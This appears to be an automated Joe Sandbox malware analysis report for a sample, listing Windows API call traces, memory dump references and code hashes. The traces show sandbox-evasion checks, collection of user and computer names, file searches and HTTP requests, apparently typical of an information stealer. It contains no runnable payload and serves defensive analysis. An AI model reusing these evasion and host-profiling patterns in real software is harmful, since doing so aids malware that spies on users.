                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                    • String ID: :$C$\
                                                                                    • API String ID: 3790021787-3809124531
                                                                                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                    • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                                                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                    • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                                                     Control-flow Graph: function 2d1003c (rendered graph not reproduced here)
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D1024D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: cess$kernel32.dll
                                                                                    • API String ID: 4275171209-1230238691
                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction ID: c7b5f19e3b7f87129c44444ffa352ad939145b48d9a94057073eda1ca933b071
                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction Fuzzy Hash: 46526874A00229DFDB64DF68D984BA8BBB1BF09305F1480D9E94DAB751DB30AE85CF14

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08DD0), ref: 004198A1
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08DE8), ref: 004198BA
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08E00), ref: 004198D2
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08D58), ref: 004198EA
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08D10), ref: 00419903
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E34250), ref: 0041991B
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E026B0), ref: 00419933
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E02850), ref: 0041994C
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08A70), ref: 00419964
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E358B8), ref: 0041997C
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E35A50), ref: 00419995
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E35840), ref: 004199AD
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E02870), ref: 004199C5
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E35858), ref: 004199DE
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                                                      • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                                      • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                                                      • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                                                      • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                                                      • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                                                      • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                                      • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                                                      • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                                                    • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                                                      • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                                                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02E342B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                                                    • Sleep.KERNEL32(00001770), ref: 00416B04
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,02E342B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                                                    • ExitProcess.KERNEL32 ref: 00416B22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3511611419-0
                                                                                    • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                                                    • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                                                    • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                                                    • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ??2@$CrackInternetlstrlen
                                                                                    • String ID: <
                                                                                    • API String ID: 1683549937-4251816714
                                                                                    • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                                                    • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                                                    • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                                                    • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                    • __aulldiv.LIBCMT ref: 00401258
                                                                                    • __aulldiv.LIBCMT ref: 00401266
                                                                                    • ExitProcess.KERNEL32 ref: 00401294
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 3404098578-2766056989
                                                                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                    • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                    • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02E342B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                                                    • Sleep.KERNEL32(00001770), ref: 00416B04
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,02E342B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                                                    • ExitProcess.KERNEL32 ref: 00416B22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                    • String ID:
                                                                                    • API String ID: 941982115-0
                                                                                    • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                                                    • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                                                    • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                                                    • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00406303
                                                                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                    • String ID: ERROR$ERROR
                                                                                    • API String ID: 3287882509-2579291623
                                                                                    • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                                                    • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                                                    • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                                                    • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocComputerNameProcess
                                                                                    • String ID:
                                                                                    • API String ID: 4203777966-0
                                                                                    • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                                    • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                                                    • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                                    • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                                                    • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                                                    • ExitProcess.KERNEL32 ref: 00401143
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1103761159-0
                                                                                    • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                                    • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                                                    • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                                    • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E0A206
                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 02E0A226
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E09000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2e09000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 3833638111-0
                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction ID: 3b8f8fb239844d721e86dae0ded23092d315b8942027d1ebd459176c088aa2a8
                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction Fuzzy Hash: DCF0C2321807146BD7203AF49CCCFAA72E8AF49628F205538EB46911C0DB70E8864A60
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000400,?,?,02D10223,?,?), ref: 02D10E19
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,02D10223,?,?), ref: 02D10E1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction ID: fe185a62a02c14c90e097e00a0269c1189d12346271cb14313f70f45d1455235
                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction Fuzzy Hash: 20D0123114512877DB003A95DC09BCD7B1CDF05B67F008011FB0DD9580C770994046E5
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2087232378-0
                                                                                    • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                                    • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                                                    • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                                    • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                                                    APIs
                                                                                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                    • ExitProcess.KERNEL32 ref: 004011C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                    • String ID:
                                                                                    • API String ID: 1004333139-0
                                                                                    • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                                                    • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                                                    • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                                                    • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02E09EEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E09000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2e09000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction ID: 52a680a6d6074e4487cacb0894115f9d8f39203262b5968be776756f8f148f2f
                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction Fuzzy Hash: D0112D79A40208EFDB01DF98C985E99BBF5AF08750F058094F9489B362D371EA90DF90
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 004138CC
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                                                    • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
